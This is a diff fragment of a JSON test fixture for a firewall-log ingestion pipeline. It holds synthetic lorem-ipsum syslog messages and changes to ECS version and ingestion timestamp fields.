"2021-12-09T13:37:31.907212300Z" + "ingested": "2021-12-14T14:43:11.779425756Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=umtot date=2018-11-9 time=2:12:32 log_id=eumiurer devid=inv devname=eac logid=rainc type=tinculp subtype=uianon level=high vd=corpori srcip=10.232.131.132 srcport=581 srcintf=enp0s6255 dstip=10.232.246.98 dstport=1854 dstintf=enp0s1526 poluuid=ivelit sessionid=itlabori proto=icmp action=accept policyid=oide trandisp=magni duration=72.993000 sentbyte=5817 rcvdbyte=6960 devtype=rrorsit osname=emipsu osversion=1.6603 mastersrcmac=temUte srcmac=01:00:5e:fe:be:28 crscore=134.746000 craction=hitec crlevel=sci eventtype=luptatev user=ruredo service=iamquis hostname=dquiac6194.api.lan profile=nidolo reqtype=runtmoll url=https://www5.example.org/utlabo/scip.html?voluptas=inv#upta direction=external msg=ors method=olupta cat=raincidu catdesc=nisi device_id=uipexea log_id=taedic pri=high 
userfrom=ugi adminprof=urExcep timezone=CET main_type=usant trigger_policy=uidolore sub_type=litse severity_level=ugitse policy=utfugi src=10.241.140.241 src_port=1813 dst=10.180.162.174 dst_port=7186 http_method=ido http_url=atnu http_host=ssuscipi http_agent=evita http_session_id=tconsect signature_subclass=lpaquiof signature_id=532 srccountry=lors content_switch_name=Finibus server_pool_name=totam false_positive_mitigation=idat user_name=nulapar monitor_status=git http_refer=https://www5.example.com/odtem/tati.jpg?ueips=umqu#ntexpli http_version=siuta dev_id=porincid threat_weight=itame history_threat_weight=inv threat_level=remaper ftp_mode=quaUteni ftp_cmd=evelit cipher_suite=oluptat msg_id=ditem", "event": { - "ingested": "2021-12-09T13:37:31.907216900Z" + "ingested": "2021-12-14T14:43:11.779426287Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-11-23 time=9:15:06 devname=oditautf device_id=asiarc log_id=eddoei type=generic subtype=iatqu pri=very-high devid=itessec devname=dat logid=tdol type=emul subtype=ariatu level=high vd=reseo srcip=10.53.70.207 srcport=1793 srcintf=lo2279 dstip=10.73.140.61 dstport=2114 dstintf=lo368 poluuid=stlabo sessionid=atema proto=1 action=deny policyid=orporiss trandisp=iamq duration=128.426000 sentbyte=1800 rcvdbyte=5783 devtype=pis osname=riosam osversion=1.2052 mastersrcmac=iosam srcmac=01:00:5e:21:d3:0a crscore=65.426000 craction=archi crlevel=nes eventtype=atvolupt user=umwritt service=uae hostname=amco1592.mail.host profile=aaliq reqtype=olupta url=https://internal.example.com/ssusci/snostrud.txt?dolo=siutaliq#obeata direction=outbound msg=tame method=olo cat=vel catdesc=equamn device_id=tempora log_id=enimip pri=very-high userfrom=saqua adminprof=aperia timezone=OMST main_type=tNeque trigger_policy=metcon sub_type=enimadmi severity_level=orem policy=corpor src=10.110.99.222 src_port=5685 dst=10.62.140.108 dst_port=1225 
http_method=ssitasp http_url=ptat http_host=asp http_agent=uatDui http_session_id=nofdeFin signature_subclass=unde signature_id=3979 srccountry=seruntm content_switch_name=aera server_pool_name=scive false_positive_mitigation=ngelit user_name=moenimi monitor_status=mqu http_refer=https://mail.example.org/ueipsaq/upid.gif?utla=emUte#tisund http_version=tutla dev_id=isund threat_weight=atemU history_threat_weight=uidex threat_level=uptate ftp_mode=eac ftp_cmd=peria cipher_suite=amaliq msg_id=ium", "event": { - "ingested": "2021-12-09T13:37:31.907221300Z" + "ingested": "2021-12-14T14:43:11.779426978Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ptate date=2018-12-7 time=4:17:40 log_id=tenatu devid=emo devname=ratio logid=maperia type=Maloru subtype=sumquia level=low vd=imadmini srcip=10.237.5.219 srcport=3828 srcintf=eth4604 dstip=10.197.99.150 dstport=3877 dstintf=enp0s7388 poluuid=odo sessionid=itseddoe proto=prm action=accept policyid=itinvo trandisp=uiavol duration=96.864000 sentbyte=2685 rcvdbyte=7612 devtype=urmagn osname=ficiade osversion=1.2691 mastersrcmac=equ srcmac=01:00:5e:f5:2a:24 crscore=163.671000 craction=mipsum crlevel=dolor eventtype=cupidata user=niamquis service=lapariat hostname=dicta7226.mail.example profile=eddoei reqtype=cingel url=https://api.example.com/temporai/umw.jpg?mveniamq=litsed#ptasn direction=unknown msg=loinv method=umd cat=madmi catdesc=xercit device_id=avolup log_id=etdo pri=medium userfrom=veleum adminprof=emUten timezone=CT main_type=proiden trigger_policy=cita sub_type=iac severity_level=ntincul policy=mnisiste src=10.4.244.115 src_port=4588 dst=10.53.50.77 dst_port=5330 http_method=lorem http_url=lore http_host=orroqu http_agent=tlabo http_session_id=iameaque signature_subclass=sautemve signature_id=6466 srccountry=emoe content_switch_name=ameiusmo server_pool_name=ntiumtot false_positive_mitigation=aeab user_name=idolo 
monitor_status=temac http_refer=https://api.example.net/ollita/idolore.html?illu=iut#asiarc http_version=imidest dev_id=mwri threat_weight=orsi history_threat_weight=ritinvol threat_level=rporiss ftp_mode=atu ftp_cmd=ddo cipher_suite=veli msg_id=ata", "event": { - "ingested": "2021-12-09T13:37:31.907225300Z" + "ingested": "2021-12-14T14:43:11.779427617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=lor dtime=2018-12-21 23:20:14.972538723 +0000 UTC devid=ori devname=eleumiu vd=amre date=2018-12-21 time=11:20:14 logid=atur type=untex subtype=Except level=very-high eventtime=econse logtime=iac srcip=10.221.100.157 srcport=865 srcintf=lo4518 srcintfrole=mqu dstip=10.236.211.111 dstport=1801 dstintf=enp0s454 dstintfrole=rauto poluuid=pteursi sessionid=iquamqua proto=tcp action=allow policyid=psumqui policytype=equeporr crscore=32.741000 craction=cusanti crlevel=doloreme appcat=nsecte service=reprehen srccountry=taspe dstcountry=litess trandisp=enimadm tranip=10.120.212.78 tranport=119 duration=17.257000 sentbyte=4752 rcvdbyte=3484 sentpkt=ntsuntin app=ectetur", "event": { - "ingested": "2021-12-09T13:37:31.907229200Z" + "ingested": "2021-12-14T14:43:11.779428487Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-1-5 time=6:22:49 logver=intocca devid=vel devname=xeacom logid=orum type=voluptat subtype=nsequ level=medium vd=tenimad srcip=10.140.215.210 srcport=7229 srcintf=lo568 dstip=10.71.213.217 dstport=7475 dstintf=eth5820 poluuid=lup sessionid=reetdolo proto=HOPOPT action=accept policyid=dolor trandisp=emagnam duration=154.150000 sentbyte=2336 rcvdbyte=5326 devtype=emull osname=enatuser osversion=1.3052 mastersrcmac=ectob srcmac=01:00:5e:4a:5d:af crscore=9.013000 craction=niamqu crlevel=nrep eventtype=lauda user=ionevo service=busB hostname=pidatatn2627.www.localdomain 
profile=eritinvo reqtype=quiav url=https://mail.example.org/ngelit/dipiscin.gif?serro=ctet#umiurere direction=inbound msg=ciun method=ssitaspe cat=deomnis catdesc=ulamcol device_id=onn log_id=redol pri=medium userfrom=utlabore adminprof=nci timezone=OMST main_type=liqu trigger_policy=ectetura sub_type=aUte severity_level=untNeque policy=roi src=10.210.82.202 src_port=2749 dst=10.208.231.15 dst_port=412 http_method=rios http_url=diconseq http_host=tenima http_agent=iusm http_session_id=mveleumi signature_subclass=equinesc signature_id=5076 srccountry=mfugiatq content_switch_name=dmini server_pool_name=emveleu false_positive_mitigation=loree user_name=riatur monitor_status=tempor http_refer=https://internal.example.com/spiciati/tise.gif?ctas=rvelillu#qua http_version=ciat dev_id=iamq threat_weight=porin history_threat_weight=yCi threat_level=arc ftp_mode=santium ftp_cmd=numquame cipher_suite=umfugi msg_id=amestqui", "event": { - "ingested": "2021-12-09T13:37:31.907232800Z" + "ingested": "2021-12-14T14:43:11.779429093Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=tesseq devname=\"nimides\" devid=\"iusmodte\" vd=involup date=2019-1-19 time=1:25:23 logid=edd type=dolorsi subtype=mcolabo level=low eventtime=exe logtime=nve srcip=10.226.255.3 srcport=5449 srcintf=lo7680 srcintfrole=iaconseq dstip=10.123.59.69 dstport=5399 dstintf=lo5835 dstintfrole=ntsunti poluuid=bor sessionid=uisnos proto=6 action=accept policyid=tation policytype=seddoe crscore=21.625000 craction=eur crlevel=ntmolli appcat=pitl service=nulap srccountry=ipexe dstcountry=aqueipsa trandisp=psum tranip=10.53.251.202 tranport=7501 duration=131.751000 sentbyte=6876 rcvdbyte=220 sentpkt=ugi app=ptate", "event": { - "ingested": "2021-12-09T13:37:31.907237300Z" + "ingested": "2021-12-14T14:43:11.779429611Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 
"1.12.0" - }, "message": "logver=rur devname=\"edut\" devid=\"sitametc\" vd=iarchite date=2019-2-2 time=8:27:57 logid=uide type=iono subtype=aboris level=very-high eventtime=imidest logtime=ulamc srcip=10.3.85.176 srcport=318 srcintf=eth2546 srcintfrole=uptateve dstip=10.212.56.26 dstport=3032 dstintf=enp0s2353 dstintfrole=loin poluuid=cinge sessionid=tutl proto=udp action=block policyid=nesciu policytype=ueip crscore=162.484000 craction=orumSe crlevel=mSe appcat=itame service=quaturv srccountry=lumdolor dstcountry=persp trandisp=leumi tranip=10.29.141.252 tranport=2077 duration=106.468000 sentbyte=3472 rcvdbyte=7868 sentpkt=orum app=reseos", "event": { - "ingested": "2021-12-09T13:37:31.907243600Z" + "ingested": "2021-12-14T14:43:11.779430117Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-2-17 time=3:30:32 devname=orem device_id=seq log_id=cus type=generic subtype=tnulap pri=very-high devid=psamvolu devname=inculp logid=eni type=tcupid subtype=ercita level=very-high vd=olorinr srcip=10.110.166.81 srcport=7354 srcintf=lo3023 dstip=10.181.48.82 dstport=1225 dstintf=eth7640 poluuid=conseq sessionid=Nemoen proto=6 action=cancel policyid=umquamei trandisp=nih duration=55.527000 sentbyte=3449 rcvdbyte=4658 devtype=quia osname=eabill osversion=1.95 mastersrcmac=oeiusmo srcmac=01:00:5e:82:ca:1b crscore=67.321000 craction=rumwrit crlevel=tionofd eventtype=ill user=orroquis service=laparia hostname=emveleu4029.api.local profile=tconse reqtype=ntsun url=https://internal.example.net/inc/riaturEx.htm?mnihilm=itinvo#lestia direction=external msg=metcons method=lumd cat=liquaUt catdesc=snos device_id=maccusan log_id=oeni pri=medium userfrom=tiaecon adminprof=tincu timezone=GMT-07:00 main_type=untmoll trigger_policy=par sub_type=idatatno severity_level=tfugit policy=tla src=10.126.11.186 src_port=589 dst=10.236.175.163 dst_port=6562 http_method=atemqui http_url=icaboN 
http_host=Utenimad http_agent=res http_session_id=officiad signature_subclass=nsectet signature_id=3977 srccountry=temU content_switch_name=ciduntut server_pool_name=ionofd false_positive_mitigation=etqua user_name=udantiu monitor_status=tium http_refer=https://internal.example.net/leumiu/iuta.html?tfugit=rorsitv#tiaecons http_version=uamestq dev_id=aliquaUt threat_weight=boreet history_threat_weight=mquam threat_level=volu ftp_mode=nof ftp_cmd=boNe cipher_suite=ovolu msg_id=cid", "event": { - "ingested": "2021-12-09T13:37:31.907248900Z" + "ingested": "2021-12-14T14:43:11.779430731Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=equamn devname=\"mes\" devid=\"itatio\" vd=ssecillu date=2019-3-3 time=10:33:06 logid=oeius type=itin subtype=nostrud level=medium eventtime=byCic logtime=mnisiuta srcip=10.171.60.173 srcport=209 srcintf=lo1917 srcintfrole=usmodite dstip=10.11.150.136 dstport=3615 dstintf=lo5438 dstintfrole=olup poluuid=urQuis sessionid=iquip proto=1 action=cancel policyid=untutl policytype=elite crscore=176.898000 craction=ipsaq crlevel=spici appcat=nvolupt service=antiu srccountry=llumquid dstcountry=paq trandisp=olup tranip=10.83.98.220 tranport=1300 duration=73.115000 sentbyte=5812 rcvdbyte=3339 sentpkt=amquis app=umtotam", "event": { - "ingested": "2021-12-09T13:37:31.907270400Z" + "ingested": "2021-12-14T14:43:11.779431315Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=pitlabo dtime=2019-03-17 17:35:40.532538723 +0000 UTC devid=lorsita devname=datatno vd=emac date=2019-3-17 time=5:35:40 logid=uiavo type=tdo subtype=ratvolup level=high eventtime=dolo logtime=quioffic srcip=10.238.49.73 srcport=1554 srcintf=enp0s11 srcintfrole=riatu dstip=10.74.88.209 dstport=740 dstintf=lo5287 dstintfrole=quep poluuid=tfugitse sessionid=oenimips proto=udp action=deny policyid=mdo 
policytype=map crscore=148.871000 craction=osqui crlevel=consequ appcat=catcupid service=velitess srccountry=sit dstcountry=ipisc trandisp=onsectet tranip=10.92.3.166 tranport=5777 duration=156.314000 sentbyte=715 rcvdbyte=3946 sentpkt=itvol app=dolo", "event": { - "ingested": "2021-12-09T13:37:31.907275800Z" + "ingested": "2021-12-14T14:43:11.779431876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=amquisno dtime=2019-04-01 00:38:14.792538723 +0000 UTC devid=uptasnul devname=ptate vd=deri date=2019-4-1 time=12:38:14 logid=periamea type=equatD subtype=quaturQu level=high eventtime=rpo logtime=inr srcip=10.119.248.36 srcport=2450 srcintf=enp0s1885 srcintfrole=ten dstip=10.187.107.47 dstport=288 dstintf=lo2445 dstintfrole=fugia poluuid=psa sessionid=iset proto=prm action=allow policyid=ecte policytype=ionemull crscore=84.399000 craction=sBo crlevel=nimides appcat=iurere service=edolorin srccountry=labor dstcountry=quelaud trandisp=ira tranip=10.84.200.121 tranport=3226 duration=128.212000 sentbyte=2150 rcvdbyte=4329 sentpkt=nos app=icta", "event": { - "ingested": "2021-12-09T13:37:31.907281300Z" + "ingested": "2021-12-14T14:43:11.779432520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=itseddo devname=\"tasu\" devid=\"mquae\" vd=CSedu date=2019-4-15 time=7:40:49 logid=atae type=aeconseq subtype=boNemo level=very-high eventtime=nemulla logtime=tmollit srcip=10.167.128.229 srcport=4052 srcintf=eth1833 srcintfrole=ciatisu dstip=10.135.213.17 dstport=6427 dstintf=eth6468 dstintfrole=ritat poluuid=dipi sessionid=asnulapa proto=prm action=block policyid=onsequa policytype=seddoe crscore=23.021000 craction=Bonorume crlevel=emeumfu appcat=tla service=uidexea srccountry=odtem dstcountry=nvolupt trandisp=stia tranip=10.30.239.222 tranport=1546 duration=10.721000 sentbyte=6561 
rcvdbyte=1057 sentpkt=itectobe app=rroq", "event": { - "ingested": "2021-12-09T13:37:31.907286700Z" + "ingested": "2021-12-14T14:43:11.779433029Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-4-29 time=2:43:23 devname=uunt device_id=pic log_id=unt type=generic subtype=emUt pri=medium devid=pernatur devname=orem logid=enbyCice type=velil subtype=nsequat level=low vd=duntutl srcip=10.238.172.76 srcport=156 srcintf=lo1215 dstip=10.201.119.253 dstport=2230 dstintf=enp0s7218 poluuid=nimad sessionid=tionu proto=udp action=block policyid=emagna trandisp=quin duration=68.078000 sentbyte=2527 rcvdbyte=1150 devtype=consequ osname=min osversion=1.1028 mastersrcmac=edicta srcmac=01:00:5e:cd:6c:ed crscore=163.905000 craction=itinvolu crlevel=urerepre eventtype=iumdol user=serror service=uptass hostname=rspic5637.api.local profile=itatise reqtype=iut url=https://api.example.net/ita/esse.txt?amquis=iatquovo#rExce direction=inbound msg=uraut method=reetdol cat=umtotam catdesc=itaedi device_id=ant log_id=tiumt pri=very-high userfrom=ratvolup adminprof=iamqu timezone=CT main_type=quaturve trigger_policy=tsunti sub_type=ero severity_level=iusmodi policy=acomm src=10.169.133.219 src_port=92 dst=10.115.166.48 dst_port=7491 http_method=eleumiur http_url=ididun http_host=edi http_agent=gia http_session_id=uaturQui signature_subclass=emi signature_id=5446 srccountry=etM content_switch_name=eve server_pool_name=iru false_positive_mitigation=ipit user_name=emq monitor_status=elitsedq http_refer=https://www.example.net/onsequat/emagnaa.gif?itse=tco#nnumqua http_version=erit dev_id=lorsitam threat_weight=emagnama history_threat_weight=ute threat_level=Excep ftp_mode=utpersp ftp_cmd=rehe cipher_suite=tiumt msg_id=ulamc", "event": { - "ingested": "2021-12-09T13:37:31.907292100Z" + "ingested": "2021-12-14T14:43:11.779433523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=runt date=2019-5-13 time=9:45:57 log_id=emipsu devid=icaboNem devname=Except logid=fugits type=maliquam subtype=mav level=very-high vd=ecill srcip=10.36.122.89 srcport=5040 srcintf=lo3887 dstip=10.206.76.186 dstport=741 dstintf=eth2435 poluuid=atisund sessionid=enbyCic proto=1 action=block policyid=nrepre trandisp=uisautem duration=145.667000 sentbyte=4247 rcvdbyte=4374 devtype=tio osname=aconseq osversion=1.4195 mastersrcmac=enatuser srcmac=01:00:5e:1a:9c:4f crscore=124.786000 craction=rcitatio crlevel=olore eventtype=ntexp user=atio service=roquisqu hostname=rror3870.www5.local profile=volu reqtype=occ url=https://www5.example.net/culpa/isun.txt?cola=tura#rat direction=internal msg=sect method=ing cat=nis catdesc=aboreet device_id=ulapari log_id=isetqu pri=high userfrom=ons adminprof=Sedu timezone=CEST main_type=icaboNem trigger_policy=enderi sub_type=edqu severity_level=cita policy=uidolore src=10.146.255.40 src_port=3003 dst=10.226.39.82 dst_port=3950 http_method=oluptate http_url=orumwrit http_host=aconse http_agent=ites http_session_id=abori signature_subclass=dolor signature_id=3543 srccountry=amqu content_switch_name=uamest server_pool_name=ntoccaec false_positive_mitigation=ites user_name=caecatcu monitor_status=iof http_refer=https://api.example.com/uae/mdolo.txt?aute=itatise#utpers http_version=equunt dev_id=Nemo threat_weight=itse history_threat_weight=lillumq threat_level=idid ftp_mode=uis ftp_cmd=velits cipher_suite=mmodo msg_id=rporissu", "event": { - "ingested": "2021-12-09T13:37:31.907297600Z" + "ingested": "2021-12-14T14:43:11.779434226Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=utemvel dtime=2019-05-28 04:48:31.832538723 +0000 UTC devid=exercita devname=emaperi vd=aspernat date=2019-5-28 time=4:48:31 logid=ddoei type=nihi subtype=umfu level=low eventtime=ehen 
logtime=olupt srcip=10.53.82.96 srcport=7088 srcintf=eth297 srcintfrole=nostru dstip=10.224.212.88 dstport=5404 dstintf=lo4266 dstintfrole=natuserr poluuid=ipi sessionid=eniamqui proto=icmp action=deny policyid=urvelill policytype=iadese crscore=174.116000 craction=isundeo crlevel=emq appcat=rehender service=uat srccountry=apa dstcountry=tani trandisp=per tranip=10.35.240.70 tranport=2587 duration=62.993000 sentbyte=7102 rcvdbyte=2380 sentpkt=ataevit app=chi", "event": { - "ingested": "2021-12-09T13:37:31.907303100Z" + "ingested": "2021-12-14T14:43:11.779434793Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=lorsita devname=\"oeius\" devid=\"trud\" vd=aco date=2019-6-11 time=11:51:06 logid=uei type=tsedqu subtype=agni level=very-high eventtime=rsint logtime=catc srcip=10.186.253.240 srcport=6982 srcintf=enp0s5429 srcintfrole=end dstip=10.233.128.7 dstport=2455 dstintf=eth5315 dstintfrole=onnumq poluuid=lupt sessionid=ugiatq proto=prm action=cancel policyid=utla policytype=iosamn crscore=164.209000 craction=tor crlevel=toreve appcat=ita service=orain srccountry=tnulap dstcountry=aevitae trandisp=aqu tranip=10.66.149.234 tranport=6236 duration=128.130000 sentbyte=6344 rcvdbyte=475 sentpkt=loremeu app=tate", "event": { - "ingested": "2021-12-09T13:37:31.907308500Z" + "ingested": "2021-12-14T14:43:11.779435455Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=elaud dtime=2019-06-25 18:53:40.352538723 +0000 UTC devid=iad devname=irat vd=upi date=2019-6-25 time=6:53:40 logid=rsintocc type=itanim subtype=sinto level=medium eventtime=lore logtime=eabi srcip=10.227.133.134 srcport=3351 srcintf=enp0s4820 srcintfrole=erspici dstip=10.46.11.114 dstport=4009 dstintf=enp0s7159 dstintfrole=oremq poluuid=rspiciat sessionid=ptas proto=tcp action=cancel policyid=ore policytype=dut 
crscore=128.554000 craction=remape crlevel=itectob appcat=sedquia service=mquisnos srccountry=mwritt dstcountry=avolupt trandisp=lumdolo tranip=10.173.140.201 tranport=6422 duration=133.394000 sentbyte=7249 rcvdbyte=1387 sentpkt=str app=sit", "event": { - "ingested": "2021-12-09T13:37:31.907313900Z" + "ingested": "2021-12-14T14:43:11.779436049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=elillum dtime=2019-07-10 01:56:14.612538723 +0000 UTC devid=isnos devname=emp vd=eos date=2019-7-10 time=1:56:14 logid=sciveli type=Bonoru subtype=rai level=low eventtime=omm logtime=cepteu srcip=10.205.18.11 srcport=6737 srcintf=eth4759 srcintfrole=ueipsa dstip=10.69.130.207 dstport=1191 dstintf=eth614 dstintfrole=architec poluuid=era sessionid=ptatem proto=udp action=cancel policyid=isi policytype=ssecill crscore=44.181000 craction=exerci crlevel=ptatemUt appcat=temqu service=ofd srccountry=nimvenia dstcountry=ari trandisp=eir tranip=10.170.236.123 tranport=4346 duration=150.036000 sentbyte=6877 rcvdbyte=1751 sentpkt=orum app=tation", "event": { - "ingested": "2021-12-09T13:37:31.907319300Z" + "ingested": "2021-12-14T14:43:11.779436778Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=repre date=2019-7-24 time=8:58:48 log_id=ore devid=ionemu devname=rehend logid=uiad type=tasu subtype=sciun level=high vd=taev srcip=10.196.124.206 srcport=7569 srcintf=enp0s2181 dstip=10.186.88.110 dstport=4203 dstintf=enp0s5497 poluuid=asnulapa sessionid=hende proto=0 action=deny policyid=ntmolli trandisp=uto duration=178.755000 sentbyte=6361 rcvdbyte=1742 devtype=ipsu osname=taedi osversion=1.2682 mastersrcmac=acom srcmac=01:00:5e:99:e3:a5 crscore=175.099000 craction=Cic crlevel=aturveli eventtype=lica user=Exc service=amvolup hostname=velill3821.mail.invalid profile=asnulap reqtype=usmodte 
url=https://example.com/loremag/mqu.gif?bore=lapari#aborios direction=external msg=lorem method=mnisiuta cat=quiadolo catdesc=abo device_id=msequine log_id=mrem pri=medium userfrom=atuserr adminprof=nsequatu timezone=ET main_type=uptasnu trigger_policy=atemUt sub_type=iurere severity_level=oident policy=volup src=10.97.254.192 src_port=302 dst=10.124.34.251 dst_port=3899 http_method=imide http_url=sequa http_host=ine http_agent=ollitan http_session_id=eacomm signature_subclass=onseq signature_id=6250 srccountry=reetd content_switch_name=equamnih server_pool_name=tevelite false_positive_mitigation=sitvolup user_name=epor monitor_status=atatnonp http_refer=https://example.org/elauda/ria.htm?uptatemU=iono#quun http_version=itationu dev_id=eniamqui threat_weight=adolo history_threat_weight=oreetdol threat_level=uinesciu ftp_mode=sciun ftp_cmd=tametc cipher_suite=rExcep msg_id=avolup", "event": { - "ingested": "2021-12-09T13:37:31.907324700Z" + "ingested": "2021-12-14T14:43:11.779437276Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=olores devname=\"ineavol\" devid=\"bori\" vd=taev date=2019-8-7 time=4:01:23 logid=ngelit type=uidexea subtype=stiaec level=very-high eventtime=quipex logtime=rsintoc srcip=10.9.41.221 srcport=4010 srcintf=eth434 srcintfrole=estlabor dstip=10.81.58.91 dstport=2247 dstintf=lo6072 dstintfrole=udexerci poluuid=onemul sessionid=elaud proto=tcp action=cancel policyid=trudexe policytype=tiumtota crscore=53.861000 craction=ariaturE crlevel=fug appcat=umqu service=umqu srccountry=roide dstcountry=tio trandisp=autem tranip=10.204.98.238 tranport=3885 duration=108.380000 sentbyte=2498 rcvdbyte=3936 sentpkt=aquioffi app=aliqui", "event": { - "ingested": "2021-12-09T13:37:31.907329700Z" + "ingested": "2021-12-14T14:43:11.779437744Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 
"message": "date=2019-8-21 time=11:03:57 devname=unti device_id=tena log_id=velits type=event subtype=oditautf pri=high desc=rmagni user=tiono userfrom=utemvele msg=taevi action=cancel adom=xplicabo4308.www.example session_id=tquo", "event": { - "ingested": "2021-12-09T13:37:31.907333Z" + "ingested": "2021-12-14T14:43:11.779438251Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=nrepr devname=\"uipex\" devid=\"alorumw\" vd=nibus date=2019-9-5 time=6:06:31 logid=eiusmo type=rci subtype=seosquir level=medium eventtime=ume logtime=ercitati srcip=10.35.84.125 srcport=341 srcintf=enp0s2388 srcintfrole=pernatu dstip=10.37.120.29 dstport=4170 dstintf=enp0s1127 dstintfrole=tasuntex poluuid=etura sessionid=taedi proto=udp action=accept policyid=quiacon policytype=udexerc crscore=66.169000 craction=undeomni crlevel=ritquiin appcat=taspern service=iadeser srccountry=nos dstcountry=mollita trandisp=eserun tranip=10.212.208.70 tranport=3237 duration=36.569000 sentbyte=5330 rcvdbyte=11 sentpkt=otamr app=eveli", "event": { - "ingested": "2021-12-09T13:37:31.907337300Z" + "ingested": "2021-12-14T14:43:11.779438783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=temsequi devname=\"aturvel\" devid=\"elaudan\" vd=alorum date=2019-9-19 time=1:09:05 logid=olor type=inesc subtype=tlaborio level=high eventtime=equeporr logtime=seq srcip=10.143.65.84 srcport=2670 srcintf=enp0s5828 srcintfrole=ddoeiu dstip=10.199.201.26 dstport=3770 dstintf=eth4236 dstintfrole=ore poluuid=onse sessionid=abo proto=1 action=accept policyid=magnaa policytype=tateveli crscore=94.258000 craction=xplica crlevel=dex appcat=rsintocc service=iusmo srccountry=oquisqu dstcountry=ullamcor trandisp=remagn tranip=10.207.207.106 tranport=2048 duration=94.877000 sentbyte=6896 rcvdbyte=7419 sentpkt=tvolup app=ites", "event": { - 
"ingested": "2021-12-09T13:37:31.907342100Z" + "ingested": "2021-12-14T14:43:11.779439338Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=rExce dtime=2019-10-03 20:11:40.172538723 +0000 UTC devid=rittenby devname=gni vd=ritq date=2019-10-3 time=8:11:40 logid=lestiaec type=rissusci subtype=fdeFi level=high eventtime=ehende logtime=riatu srcip=10.204.27.48 srcport=5998 srcintf=lo7358 srcintfrole=emaperia dstip=10.163.236.253 dstport=7768 dstintf=enp0s2100 dstintfrole=sequatu poluuid=ugi sessionid=oditau proto=1 action=block policyid=mvele policytype=atae crscore=123.668000 craction=imips crlevel=admi appcat=ocons service=tiumdol srccountry=sunt dstcountry=rrorsi trandisp=remagna tranip=10.41.61.88 tranport=426 duration=82.943000 sentbyte=525 rcvdbyte=3702 sentpkt=dolor app=ips", "event": { - "ingested": "2021-12-09T13:37:31.907346800Z" + "ingested": "2021-12-14T14:43:11.779439899Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ipitlab dtime=2019-10-18 03:14:14.432538723 +0000 UTC devid=ipsa devname=dents vd=erepreh date=2019-10-18 time=3:14:14 logid=amest type=dolore subtype=xer level=medium eventtime=onemul logtime=off srcip=10.246.81.164 srcport=3453 srcintf=lo3071 srcintfrole=ende dstip=10.185.44.26 dstport=3193 dstintf=lo7861 dstintfrole=tationul poluuid=tam sessionid=byCic proto=0 action=cancel policyid=cons policytype=serro crscore=5.473000 craction=uiac crlevel=aecatcu appcat=sed service=uisnostr srccountry=aquei dstcountry=ation trandisp=sumqu tranip=10.53.110.111 tranport=2549 duration=141.141000 sentbyte=5569 rcvdbyte=5239 sentpkt=entore app=uaturQ", "event": { - "ingested": "2021-12-09T13:37:31.907351Z" + "ingested": "2021-12-14T14:43:11.779440545Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 
